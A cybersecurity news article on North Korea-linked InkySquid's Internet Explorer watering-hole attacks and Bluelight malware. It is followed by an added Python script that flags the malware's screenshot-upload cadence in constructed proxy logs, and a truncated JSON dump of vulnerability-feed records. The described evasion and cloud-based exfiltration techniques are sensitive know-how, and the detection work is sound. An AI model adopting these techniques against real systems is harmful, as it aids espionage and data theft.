The InkySquid advanced persistent threat (APT) group, which researchers have linked to the North Korean government, was caught launching watering hole attacks against a South Korean newspaper using known Internet Explorer vulnerabilities.
A new analysis from Volexity reported that its researchers noticed [suspicious code being loaded](<https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/>) on the Daily NK site, a news outlet focused on North Korea, starting in April. Although the links led to real files, malicious code was inserted only for brief periods, making it difficult to detect. The researchers suspected the attack was ongoing between March and June.
“When requested, with the correct Internet Explorer user-agent, this host would serve additional obfuscated JavaScript code,” Volexity’s team reported. “As with the initial redirect, the attacker chose to bury their malicious code amongst legitimate code. In this case, the attacker used the ‘bPopUp’ JavaScript library alongside their own code.”
The researchers added that since the code is largely legitimate, it would likely evade both manual and [automated detection](<https://threatpost.com/security-risks-cloud/168754/>). The code, which the attackers camouflaged among real content, is consistent with Internet Explorer bug CVE-2020-1380, the report said.
Another similar attack from the InkySquid group (aka APT37, Reaper or ScarCruft) leveraged CVE-2021-26411 to [attack Internet Explorer](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) as well as legacy versions of Microsoft Edge, according to Volexity.
“As with the CVE-2020-1380 example, the attacker made use of encoded content stored in SVG tags to store both key strings and their initial payload,” the researchers explained. “The initial command-and-control (C2) URLs were the same as those observed in the CVE-2020-1380 case.”
## **InkySquid’s Bluelight Malware**
The group has also developed a new [malware family](<https://threatpost.com/malware-makers-using-exotic-programming-languages/168117/>) that the report calls “Bluelight” — a name that was chosen because the word “bluelight” was used in the malware’s program database (PDB) code.
Cobalt Strike was used to initiate all three of these attacks, the report said. Bluelight appears to be delivered as a secondary payload.
“The Bluelight malware family uses different cloud providers to facilitate C2,” the report said. “This specific sample leveraged the Microsoft Graph API for its C2 operations. Upon start-up, Bluelight performs an OAuth2 token authentication using hard-coded parameters.”
After authentication, Volexity observed, the malware creates folders with innocuous-sounding names like “logo,” “normal,” “background,” “theme” and “round” in the OneDrive subdirectory, which is controlled by a C2 server.
Then it sets about exfiltrating data, including username, IP addresses, VM tools running on the machine, OS version and more, formatted as JSON (JavaScript Object Notation), the team explained.
“The main C2 loop starts after the initial upload of the reconnaissance data, iterating once every approximately 30 seconds,” the report said. “For the first five minutes, each iteration will capture a screenshot of the display and upload it to the ‘normal’ subdirectory with an encoded timestamp as the filename. After the first five minutes, the screenshot uploads once every five minutes.”
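The upload cadence described in that quote gives defenders a timing signature to hunt for. The following is an added example, not code from Volexity or Threatpost: it scans proxy log lines for a client that writes to a “normal” folder through the Microsoft Graph API roughly every 30 seconds for about five minutes and then roughly every five minutes. The log format, the URL paths, the IP addresses and the tolerance windows are all assumptions constructed for illustration, and the approach presumes a TLS-inspecting proxy that records request paths.

```python
from collections import defaultdict
from datetime import datetime, timedelta

GRAPH_HOST = "graph.microsoft.com"
SCREENSHOT_FOLDER = "normal"   # folder named in the report for screenshots
FAST_GAP = (20, 45)            # assumed tolerance around "approximately 30 seconds"
SLOW_GAP = (240, 360)          # assumed tolerance around "every five minutes"
FAST_SPAN = (240, 360)         # the fast phase should last about five minutes
MIN_FAST_GAPS = 6              # assumed minimum evidence for the fast phase
MIN_SLOW_GAPS = 2              # assumed minimum evidence for the slow phase


def parse_line(line):
    """Parse a constructed log line: '<iso-ts> <client> <method> <host> <path>'."""
    ts, client, method, host, path = line.split(maxsplit=4)
    return datetime.fromisoformat(ts), client, method, host.lower(), path


def writes_to_folder(path, folder):
    """True if `folder` is a directory segment of the upload path."""
    segments = [s.rstrip(":").lower() for s in path.split("/") if s]
    return folder in segments[:-2]  # skip the file name and the 'content' suffix


def run_length(gaps, start, window):
    """Count consecutive gaps from `start` that fall inside `window`."""
    n = 0
    while start + n < len(gaps) and window[0] <= gaps[start + n] <= window[1]:
        n += 1
    return n


def find_screenshot_cadence(lines):
    """Return {client: evidence} for clients matching the two-phase cadence."""
    uploads = defaultdict(list)
    for line in lines:
        ts, client, method, host, path = parse_line(line)
        if (method == "PUT" and host == GRAPH_HOST
                and writes_to_folder(path, SCREENSHOT_FOLDER)):
            uploads[client].append(ts)

    hits = {}
    for client, times in uploads.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        fast = run_length(gaps, 0, FAST_GAP)        # ~30 s phase
        slow = run_length(gaps, fast, SLOW_GAP)     # ~5 min phase that follows
        fast_span = sum(gaps[:fast])
        if (fast >= MIN_FAST_GAPS and slow >= MIN_SLOW_GAPS
                and FAST_SPAN[0] <= fast_span <= FAST_SPAN[1]):
            hits[client] = {"fast_uploads": fast + 1,
                            "fast_span_s": fast_span,
                            "slow_gaps": slow}
    return hits


def constructed_log():
    """Constructed sample lines (not real telemetry) for three clients."""
    lines = []
    base = datetime(2021, 1, 1, 9, 0, 0)
    # Client matching the described cadence, with a little jitter.
    t = base
    for n, gap in enumerate([0, 29, 31, 30, 32, 28, 30, 31, 29, 30, 30,
                             301, 299, 300]):
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()} 10.0.0.21 PUT {GRAPH_HOST} "
                     f"/v1.0/me/drive/root:/app/normal/f{n:03d}:/content")
    # Ordinary sync traffic to other folders.
    for off, folder in [(5, "Documents"), (400, "Documents"), (2000, "theme")]:
        ts = (base + timedelta(seconds=off)).isoformat()
        lines.append(f"{ts} 10.0.0.35 PUT {GRAPH_HOST} "
                     f"/v1.0/me/drive/root:/{folder}/report.docx:/content")
    # A folder that happens to be called 'normal', written irregularly.
    for off in [0, 7, 1900]:
        ts = (base + timedelta(seconds=off)).isoformat()
        lines.append(f"{ts} 10.0.0.40 PUT {GRAPH_HOST} "
                     f"/v1.0/me/drive/root:/photos/normal/img{off}.png:/content")
    return lines


if __name__ == "__main__":
    for client, evidence in find_screenshot_cadence(constructed_log()).items():
        print(client, evidence)
```

Folder names alone are weak indicators because they are deliberately innocuous; the timing pattern is what separates the first client from the other two in the sample.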
While leveraging known IE bugs won’t work on a wide swath of targets, once a system is infected, detection is difficult thanks to the use of legit code as cover.
“While strategic web compromises (SWCs) are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers,” the report said.
Source: Threatpost, “InkySquid State Actor Exploiting Known IE Bugs,” by Becky Bracken, published 2021-08-19. <https://threatpost.com/inkysquid-exploiting-ie-bugs/168833/>. CVEs referenced: CVE-2020-1380, CVE-2021-26411.
{"attackerkb": [{"lastseen": "2023-06-06T15:10:08", "description": "Internet Explorer Memory Corruption Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 05, 2021 1:20pm UTC reported:\n\nThere is now [public threat intelligence](<https://twitter.com/jeromesegura/status/1378584985792180227>) that the Purple Fox exploit kit has incorporated this vulnerability and is [exploiting it](<https://twitter.com/nao_sec/status/1378546891349106692>).\n\n**gwillcox-r7** at March 11, 2021 5:57pm UTC reported:\n\nThere is now [public threat intelligence](<https://twitter.com/jeromesegura/status/1378584985792180227>) that the Purple Fox exploit kit has incorporated this vulnerability and is [exploiting it](<https://twitter.com/nao_sec/status/1378546891349106692>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-26411", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2021-03-18T00:00:00", "id": 
"AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "href": "https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-07T00:10:33", "description": "Scripting Engine Memory Corruption Vulnerability\n\n \n**Recent assessments:** \n \n**architect00** at May 14, 2021 10:33am UTC reported:\n\n## Details\n\nThe vulnerability affects Internet Explorer 11 on all Windows Versions. It is located in the `jscript9.dll` library, which is used to execute javascript.\n\nPossible attack vectors:\n\n * website content \n\n * activeX components in office documents \n\n\nGoogle Project Zero released a PoC on 13.05.2021, which triggers the vulnerability and causes a crash. At the time of writing I could not find any weaponized exploit.\n\nThe CVSS rating of the vulnerability differs between Windows desktop versions and server versions. In server versions the CVSS _Privileges Required_ is set to _High_. Desktop versions are rated with CVSS _None_. The reason could be, that IE _enhanced protection mode_ is disabled on Windows desktop versions and enabled on server versions by default.\n\n## Rating explanation\n\nMy rating of the exploitability score was affected by the availability of the PoC and the Microsoft exploitability rating. In year 2020, Operation PowerFall was using a similar vulnerability (CVE-2020-1380) in IE. I expect to see exploits for CVE-2021-26419 in a similar context.\n\nAttackers might gain direct control over the host after exploitation without a sandbox escape. IE 11 does have a _enhanced protected mode (EPM)_, which runs IE in an AppContainer and acts as a sandbox. 
EPM was introduced with Windows 8 and is disabled by default on Windows desktop versions.\n\n## Sources\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26419> \n\n * <https://threatpost.com/wormable-windows-bug-dos-rce/166057/> \n\n * <https://bugs.chromium.org/p/project-zero/issues/detail?id=2157> \n\n * <https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/> \n\n * <https://securityintelligence.com/internet-explorer-ie-10-enhanced-protected-mode-epm-sandbox-research/> \n\n * <https://docs.microsoft.com/en-us/troubleshoot/browsers/enhanced-protected-mode-add-on-compatibility>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-26419", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26419"], "modified": "2023-08-02T00:00:00", "id": "AKB:2F48FB8A-EF4C-468F-9F4F-8BB9BB5FEC97", "href": "https://attackerkb.com/topics/3ko2JYsW6g/cve-2021-26419", "cvss": {"score": 7.6, "vector": 
"AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T01:49:17", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka \u2018Scripting Engine Memory Corruption Vulnerability\u2019. This CVE ID is unique from CVE-2020-1555, CVE-2020-1570.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at August 11, 2020 10:53pm UTC reported:\n\nUpdate: Reported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nTLDR: Originally this was written as a low priority issue, however after further discussions internally we are upping the risk due to the fact that IE 11 is installed on every Windows computer and cannot be removed (as it is an OS component), and the fact that there still remains the risk of attack via social engineering, which could get around many of the originally proposed mitigations.\n\nOriginally I wrote this as a low priority issue, however after looking into it more I\u2019m upping the risk on this as IE 11 is installed by default on every Windows system and it cannot be removed, which means that with some social engineering, its possible to compromise any Windows user\u2019s computer. Above all else this factor should be kept in mind as it means that even if an organization doesn\u2019t have IE set as its default, all it takes is a user who is convinced that to download some info they require they need to use IE instead of Firefox, and a malicious website, and attackers will start to have a foothold within the network.\n\nNow what are some of the limiting factors here? 
Well you can\u2019t uninstall IE, as it is integrated into every Windows operating system and is considered an OS component. This explains the point above as to why this vulnerability really does affect pretty much every single Windows user. However if organizations implement policies or protections that block IE from being run, then users will not be able to open IE and therefore trigger the vulnerability.\n\nThe other point to note is that according to <https://gs.statcounter.com/browser-market-share>, only 1.28% of people use IE these days, compared to 65.89% of people that use Chrome. The closest competitor there is Safari at a little over 16%. This means that this vulnerability is likely to be more of a risk to enterprises where IE use is more likely due to the prevalence of legacy systems and software, and is unlikely to affect the average home user.\n\nHowever, keep in mind that particularly in the government space, there are many organizations that still use IE by default or which require users to interact with their legacy applications using IE (due to compatibility issues or similar). These organizations need to patch this issue as soon as possible as all it takes to exploit this issue is one user browsing to a site with a malicious advertisement or one user clicking a link in a malicious email for that user to be compromised.\n\nFor those that are not using IE by default this issue will be slightly less of a risk due to the need for attackers to conduct social engineering attacks against end users to convince them to load a malicious site in IE, however remember that all it takes is one user clicking on a link for attackers to start gaining a deeper foothold into your network. 
Even if the social engineering attack only nets a 10% success rate, if your targeting an organization of 1000 users, that\u2019s 100 users that are now compromised, all of which could provide an attacker with unique possibilities to escalate their privileges within your network.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-17T00:00:00", "type": "attackerkb", "title": "CVE-2020-1380", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2020-1555", "CVE-2020-1570"], "modified": "2020-08-28T00:00:00", "id": "AKB:F65CF017-1855-42E3-9922-BF6F9F078DD9", "href": "https://attackerkb.com/topics/RZT1LsdXnm/cve-2020-1380", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:13", "description": "[](<https://thehackernews.com/images/-QrNW2pGZsXM/YRzFeUzLNRI/AAAAAAAADkA/5jruQy-AgDkRdhW-7PzZoHP3-W90X5EowCLcBGAsYHQ/s0/north-korea.jpg>)\n\nA North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect 
victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper.\n\nCybersecurity firm Volexity [attributed](<https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/>) the watering hole attacks to a threat actor it tracks as InkySquid, and more widely known by the monikers ScarCruft and APT37. Daily NK, the publication in question, is said to have hosted the malicious code from at least late March 2021 until early June 2021.\n\nThe \"clever disguise of exploit code amongst legitimate code\" and the use of custom malware enables the attackers to avoid detection, Volexity researchers said.\n\nThe attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in [August 2020](<https://thehackernews.com/2020/08/microsoft-software-patches.html>) and [March 2021](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>). Successful exploitation resulted in the deployment of a Cobalt Strike stager and novel backdoor called BLUELIGHT. 
\n\n * [CVE-2020-1380](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-1380>) (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability\n * [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability\n\nIt's worth noting that both the flaws have been actively exploited in the wild, with the latter put to use by North Korean hackers to compromise security researchers working on vulnerability research and development in a campaign that came to light earlier this January.\n\n[](<https://thehackernews.com/images/-E1lELfCsvpg/YRzEM-DMMLI/AAAAAAAADj4/gtN3LyfaO0MLnrYMwpl1LkoMvGFkm1TXACLcBGAsYHQ/s0/exploit.jpg>)\n\nIn a [separate set of attacks](<https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html>) disclosed last month, an unidentified threat actor was found exploiting the same flaw to deliver a fully-featured VBA-based remote access trojan (RAT) on compromised Windows systems.\n\nBLUELIGHT is used as a secondary payload following the successful delivery of Cobalt Strike, functioning as a full-featured remote access tool that provides complete access to a compromised system.\n\nIn addition to gathering system metadata and information about installed antivirus products, the malware is capable of executing shellcode, harvesting cookies and passwords from Internet Explorer, Microsoft Edge, and Google Chrome browsers, collecting files and downloading arbitrary executables, the results of which are exfiltrated to a remote server.\n\n\"While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers,\" the researchers noted. \"The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-18T08:33:00", "type": "thn", "title": "NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2021-08-18T14:51:37", "id": "THN:FA6A50184463DFCD20073D5EDD0F36F2", "href": "https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-01T10:08:46", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEguuDZ3qs5lgaYGEPnkSvUwvjWoNLjrTPyh6zE6rNWPcfcoi3sbiwfWOE2OLG0ZgwzBaMEgd3nhemOfZBAjXWZrvTA_2pQuFLY_ZXqKZSxQPLxDkah_q7LPIPUgatzeBpkofWujSyJFMviobYflgfFhDwuA5mkETfxo_1c2RwXl7Xqhm__-JyX2Qv5f/s728-e100/north-korean-hackers.png>)\n\nThe North Korea-linked **ScarCruft** group has been 
attributed to a previously undocumented backdoor called **Dolphin** that the threat actor has used against targets located in its southern counterpart.\n\n\"The backdoor [...] has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers,\" ESET researcher Filip Jur\u010dacko [said](<https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/>) in a new report published today.\n\nDolphin is said to be selectively deployed, with the malware using cloud services like Google Drive for data exfiltration as well as command-and-control.\n\nThe Slovak cybersecurity company said it found the implant deployed as a final-stage payload as part of a watering hole attack in early 2021 directed against a South Korean digital newspaper.\n\nThe campaign, first uncovered by [Kaspersky](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [Volexity](<https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html>) last year, [entailed](<https://thehackernews.com/2021/11/new-chinotto-spyware-targets-north.html>) the weaponization of two Internet Explorer flaws ([CVE-2020-1380](<https://nvd.nist.gov/vuln/detail/CVE-2020-1380>) and [CVE-2021-26411](<https://nvd.nist.gov/vuln/detail/CVE-2021-26411>)) to drop a backdoor named BLUELIGHT.\n\nScarCruft, also called APT37, InkySquid, Reaper, and Ricochet Chollima, is a geopolitically motivated APT group that has a track record of attacking government entities, diplomats, and news organizations associated with North Korean affairs. 
It's been known to be active since at least 2012.\n\nEarlier this April, cybersecurity firm Stairwell [disclosed](<https://thehackernews.com/2022/04/north-korean-hackers-target-journalists.html>) details of a spear-phishing attack targeting journalists covering the country with the ultimate goal of deploying a malware dubbed GOLDBACKDOOR that shares tactical overlaps with BLUELIGHT.\n\nThe latest findings from ESET shed light on a second, more sophisticated backdoor delivered to a small pool of victims via BLUELIGHT, indicative of a highly-targeted espionage operation.\n\nThis, in turn, is achieved by executing an installer shellcode that activates a loader comprising a Python and shellcode component, the latter of which runs another shellcode loader to drop the backdoor.\n\n\"While the BLUELIGHT backdoor performs basic reconnaissance and evaluation of the compromised machine after exploitation, Dolphin is more sophisticated and manually deployed only against selected victims,\" Jur\u010dacko explained.\n\nWhat makes Dolphin a lot more potent than BLUELIGHT is its ability to search removable devices and connected smartphones, and exfiltrate files of interest, such as media, documents, emails, and certificates.\n\nThe backdoor, since its original discovery in April 2021, is said to have undergone three successive iterations that come with their own set of feature improvements and grant it more detection evasion capabilities.\n\n\"Dolphin is another addition to ScarCruft's extensive arsenal of backdoors abusing cloud storage services,\" Jur\u010dacko said. 
\"One unusual capability found in prior versions of the backdoor is the ability to modify the settings of victims' Google and Gmail accounts to lower their security, presumably in order to maintain account access for the threat actors.\"\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-30T18:30:00", "type": "thn", "title": "North Korea Hackers Using New \"Dolphin\" Backdoor to Spy on South Korean Targets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2022-12-01T09:22:08", "id": "THN:27562A9FDA5CEBF33FAC792C73F4B06E", "href": "https://thehackernews.com/2022/12/north-korea-hackers-using-new-dolphin.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-09T18:09:08", "description": 
"An Internet Explorer zero-day vulnerability was actively exploited by a North Korean threat actor to target South Korean users by capitalizing on the recent [Itaewon Halloween crowd crush](<https://en.wikipedia.org/wiki/Seoul_Halloween_crowd_crush>) to trick users into downloading malware.\n\nThe discovery, reported by Google Threat Analysis Group researchers Beno\u00eet Sevens and Cl\u00e9ment Lecigne, is the latest set of attacks perpetrated by **ScarCruft**, which is also called APT37, InkySquid, Reaper, and Ricochet Chollima.\n\n\"The group has historically focused their targeting on South Korean users, North Korean defectors, policy makers, journalists, and human rights activists,\" TAG [said](<https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/>) in a Thursday analysis.\n\nThe new findings illustrate the threat actor's continued abuse of Internet Explorer flaws such as CVE-2020-1380 and CVE-2021-26411 to drop backdoors like [BLUELIGHT and Dolphin](<https://thehackernews.com/2022/12/north-korea-hackers-using-new-dolphin.html>), the latter of which was disclosed by Slovak cybersecurity firm ESET late last month.\n\nAnother key tool in its arsenal is [RokRat](<https://thehackernews.com/2021/01/alert-north-korean-hackers-targeting.html>), a Windows-based remote access trojan that comes with a wide range of functions that allow it to capture screenshots, log keystrokes, and even harvest Bluetooth device 
information.\n\nThe attack chain observed by Google TAG entails the use of a malicious Microsoft Word document that was [uploaded to VirusTotal](<https://www.virustotal.com/gui/file/926a947ea2b59d3e9a5a6875b4de2bd071b15260370f4da5e2a60ece3517a32f/>) on October 31, 2022. It abuses yet another Internet Explorer zero-day flaw in the JScript9 JavaScript engine, CVE-2022-41128, that was [patched by Microsoft](<https://thehackernews.com/2022/11/install-latest-windows-update-asap.html>) last month.\n\nThe file references the October 29 incident that took place in the Itaewon neighborhood of Seoul and exploits public interest in the tragedy to retrieve an exploit for the vulnerability upon opening it. The attack is enabled by the fact that Office renders HTML content using Internet Explorer.\n\nAs the [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1600759995020124160>) points out, the same Word file was previously shared by the Shadow Chaser Group on October 31, 2022, [describing](<https://twitter.com/ShadowChasing1/status/1587035660992454656>) it as an \"interesting DOCX injection template sample\" that originated from Korea.\n\nSuccessful exploitation is followed by the delivery of a shellcode that wipes all traces by clearing the Internet Explorer cache and history as well as downloading the next stage payload.\n\nGoogle TAG said it could not recover the follow-on malware used in the campaign, although it's suspected to have involved the deployment of RokRat, BLUELIGHT, or Dolphin.\n\n\"It is not surprising that they continue to target South Korean users,\" ESET malware analyst Filip Jur\u010dacko told The Hacker News. \"We haven't seen ScarCruft use zero-day exploits for some time. 
Previously, they were repurposing public PoCs of n-day exploits.\"\n\n\"Given the rarity/scarcity of zero-day exploits, we expect ScarCruft would use it in combination with some of their more sophisticated backdoors such as Dolphin. Moreover, the office theme of [command-and-control] domains matches previous campaigns.\"\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-08T07:59:00", "type": "thn", "title": "Google Warns of Internet Explorer Zero-Day Vulnerability Exploited by ScarCruft Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411", "CVE-2022-41128"], "modified": "2022-12-09T17:03:29", "id": "THN:0EBBF876A406C3077C85D0DC9EF01199", "href": "https://thehackernews.com/2022/12/google-warns-of-internet-explorer-zero.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:25", "description": 
